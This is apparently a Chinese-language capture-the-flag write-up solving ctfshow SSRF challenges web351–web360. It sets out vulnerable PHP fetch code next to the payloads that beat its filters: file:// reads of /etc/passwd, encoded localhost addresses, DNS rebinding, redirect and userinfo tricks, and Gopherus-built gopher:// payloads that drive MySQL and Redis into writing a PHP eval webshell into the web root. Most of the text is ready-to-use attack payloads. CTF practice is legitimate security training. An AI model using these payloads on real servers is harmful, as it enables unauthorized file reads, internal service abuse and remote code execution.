SSRF
web351
<?php error_reporting(0); highlight_file(__FILE__); $url=$_POST['url']; $ch=curl_init($url); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $result=curl_exec($ch); curl_close($ch); echo ($result); ?> # curl_init — 初始化 cURL 会话 # curl_setopt — 设置一个cURL传输选项 # curl_exec — 执行 cURL 会话 # curl_close — 关闭 cURL 会话
这一题并没有过滤,传入的url直接执行,所以可以使用file协议去读文件
url=file:///etc/passwd
或者直接访问该文件
url=http://127.0.0.1/flag.php ctfshow{9fb8189e-6fea-4f05-a021-f23c4c91a97c}
web352
<?php error_reporting(0); highlight_file(__FILE__); $url=$_POST['url']; $x=parse_url($url); if($x['scheme']==='http'||$x['scheme']==='https'){ if(!preg_match('/localhost|127.0.0/')){ $ch=curl_init($url); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $result=curl_exec($ch); curl_close($ch); echo ($result); } else{ die('hacker'); } } else{ die('hacker'); } ?> hacker
虽然有过滤,但是没什么用,因为没有明确对哪个字符串进行过滤,但是规定必须使用http或https
url=http://127.0.0.1/flag.php ctfshow{bf15c38e-afb2-434b-afea-5329ca6ce728}
web353
<?php error_reporting(0); highlight_file(__FILE__); $url=$_POST['url']; $x=parse_url($url); if($x['scheme']==='http'||$x['scheme']==='https'){ if(!preg_match('/localhost|127\.0\.|\。/i', $url)){ $ch=curl_init($url); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $result=curl_exec($ch); curl_close($ch); echo ($result); } else{ die('hacker'); } } else{ die('hacker'); } ?> hacker
这一次使用了正则匹配,且限制只能使用http(s)协议
我们可以用以下方法进行绕过
127.0.0.1 十进制整数:url=http://2130706433/flag.php 十六进制:url=http://0x7F.0.0.1/flag.php 八进制:url=http://0177.0.0.1/flag.php 十六进制整数:url=http://0x7F000001/flag.php 缺省模式:127.0.0.1写成127.1 CIDR:url=http://127.127.127.127/flag.php url=http://0/flag.php url=http://0.0.0.0/flag.php ctfshow{d91f1bfd-f48d-400d-9a81-767b3f0c9d6e}
web354
<?php error_reporting(0); highlight_file(__FILE__); $url=$_POST['url']; $x=parse_url($url); if($x['scheme']==='http'||$x['scheme']==='https'){ if(!preg_match('/localhost|1|0|。/i', $url)){ $ch=curl_init($url); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $result=curl_exec($ch); curl_close($ch); echo ($result); } else{ die('hacker'); } } else{ die('hacker'); } ?> hacker
这个过滤了1和0,限制http(s)协议
第一种方法
使用http://sudo.cc
,这个域名是指向127.0.0.1
的
url=url=http://sudo.cc/flag.php
第二种方法
302跳转
在自己的网站上面添加
<?php header("Location:http://127.0.0.1/flag.php");
第三种方法
DNS-Rebinding(dns重绑定)
自己去ceye.io注册绑定127.0.0.1然后记得前面加r
url=http://r.xxxzc8.ceye.io/flag.php
查看 profile
url=http://r.xxxxxx.ceye.io/flag.php
web355
<?php error_reporting(0); highlight_file(__FILE__); $url=$_POST['url']; $x=parse_url($url); if($x['scheme']==='http'||$x['scheme']==='https'){ $host=$x['host']; if((strlen($host)<=5)){ $ch=curl_init($url); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $result=curl_exec($ch); curl_close($ch); echo ($result); } else{ die('hacker'); } } else{ die('hacker'); } ?> hacker
这里限制了传入的url 的 host 部分的长度必须小于等于5
第一种解法
url=http://127.1/flag.php 127.1整好五位
第二种解法
url=http://0/flag.php # 0在linux系统中会解析成127.0.0.1在windows中解析成0.0.0.0
web356
<?php error_reporting(0); highlight_file(__FILE__); $url=$_POST['url']; $x=parse_url($url); if($x['scheme']==='http'||$x['scheme']==='https'){ $host=$x['host']; if((strlen($host)<=3)){ $ch=curl_init($url); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $result=curl_exec($ch); curl_close($ch); echo ($result); } else{ die('hacker'); } } else{ die('hacker'); } ?> hacker
限制长度小于等于3,用上面的方法
url=http://0/flag.php
在windows中会被解析成0.0.0.0,在linux中会被解析成127.0.0.1
web357
<?php error_reporting(0); highlight_file(__FILE__); $url=$_POST['url']; $x=parse_url($url); if($x['scheme']==='http'||$x['scheme']==='https'){ $ip = gethostbyname($x['host']); echo '</br>'.$ip.'</br>'; if(!filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE)) { die('ip!'); } echo file_get_contents($_POST['url']); } else{ die('scheme'); } ?> scheme
ceye.io
第一个随便填,第二个填127.0.0.1
url=http://r.xxxxxx.ceye.io/flag.php 39.156.66.14 ctfshow{ba38448a-6df1-45be-85f8-8c6dc1f89b5d}
web358
<?php error_reporting(0); highlight_file(__FILE__); $url=$_POST['url']; $x=parse_url($url); if(preg_match('/^http:\/\/ctf\..*show$/i',$url)){ echo file_get_contents($url); }
正则表达式的意思是以http://ctf.开头,以show结尾。 payload:http://ctf.@127.0.0.1/flag.php?show
<?php $url="http://ctf.@127.0.0.1/flag.php?a=show"; $x=parse_url($url); var_dump($x);
array(5) { ["scheme"]=> string(4) "http" ["host"]=> string(9) "127.0.0.1" ["user"]=> string(4) "ctf." ["path"]=> string(9) "/flag.php" ["query"]=> string(6) "a=show" }
前面的ctf.@
应该是解析成一个用户,后面就是参数,很容易理解
url=http://ctf.@127.0.0.1/flag.php?show ctfshow{9135f282-afb6-4abe-80c2-da78ffef26f8}
web359
git clone https://github.com/tarunkant/Gopherus
python gopherus.py --exploit mysql For making it work username should not be password protected!!! Give MySQL username: root Give query to execute: select '<?php eval($_POST['beizi'];?>' into outfile '/var/www/html/beizi.php';
Your gopher link is ready to do SSRF : gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%72%6f%6f%74%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%50%00%00%00%03%73%65%6c%65%63%74%20%27%3c%3f%70%68%70%20%65%76%61%6c%28%24%5f%50%4f%53%54%5b%27%62%65%69%7a%69%27%5d%29%3b%3f%3e%27%20%69%6e%74%6f%20%6f%75%74%66%69%6c%65%20%27%2f%76%61%72%2f%77%77%77%2f%68%74%6d%6c%2f%62%65%69%7a%69%2e%70%68%70%27%3b%01%00%00%00%01
_
后面的进行url编码,直接写木马
下面就是执行php代码进行RCE,不再展示
web360 ??
-
写webshell
-
写ssh公钥
-
写contrab计划反弹shell
-
主从复制
写webshell
<?php error_reporting(0); highlight_file(__FILE__); $url=$_POST['url']; $ch=curl_init($url); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $result=curl_exec($ch); curl_close($ch); echo ($result); ?>
打redis
python gopherus.py --exploit redis ________ .__ / _____/ ____ ______ | |__ ___________ __ __ ______ / \ ___ / _ \\____ \| | \_/ __ \_ __ \ | \/ ___/ \ \_\ ( <_> ) |_> > Y \ ___/| | \/ | /\___ \ \______ /\____/| __/|___| /\___ >__| |____//____ > \/ |__| \/ \/ \/ author: $_SpyD3r_$ Ready To get SHELL What do you want?? (ReverseShell/PHPShell): php Give web root location of server (default is /var/www/html): Give PHP Payload (We have default PHP Shell): <?php eval($_POST[beizi]);?> Your gopher link is Ready to get PHP Shell: gopher://127.0.0.1:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2432%0D%0A%0A%0A%3C%3Fphp%20eval%28%24_POST%5Bbeizi%5D%29%3B%3F%3E%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2413%0D%0A/var/www/html%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%249%0D%0Ashell.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A%0A When it's done you can get PHP Shell in /shell.php at the server with `cmd` as parmeter.
直接拿着打就完了,
还可以使用dict://
协议,探测端口6379
url=dict://127.0.0.1:6379
返回
ERR Unknown subcommand or wrong number of arguments for 'libcurl'. Try CLIENT HELP +OK
看是否需要认证
url=dict://127.0.0.1:6379/info
不需要认证
url=dict://127.0.0.1:6379/config:set:dir:/var/www/html/
再进行写马
ctfshow{6b461105-14d5-48fd-b927-c910ddd2ae6c}